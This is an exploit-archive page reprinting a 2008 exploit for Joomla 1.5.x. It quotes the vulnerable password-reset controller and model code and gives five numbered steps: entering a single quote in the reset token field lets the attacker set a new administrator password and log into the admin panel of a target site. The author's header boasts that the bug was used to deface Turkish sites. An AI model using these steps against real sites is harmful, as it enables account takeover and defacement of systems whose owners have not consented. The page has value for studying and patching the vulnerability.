Advertisement






Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

CVE Category Price Severity
CWE-16 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2008-08-19
CPE
cpe:cpe:/a:joomla:joomla:1.5
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0 0

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008080155

Below is a copy:

#####################################################################################
####                     Joomla 1.5.x Remote Admin Password Change               ####
#####################################################################################
#                                                                                   #
# Author: d3m0n ([email protected])                                                       #
# Greets: GregStar, gorion, d3d!k                                                   #
#                                                                                   #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
#                                                                                   #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399
 
function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1} 
                  
// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false)   < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130 



function confirmReset($token)
{
global $mainframe;

$db= &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3} 

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token',$token);
$mainframe->setUserState($this->_namespace.'id',$id);

return true;
}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.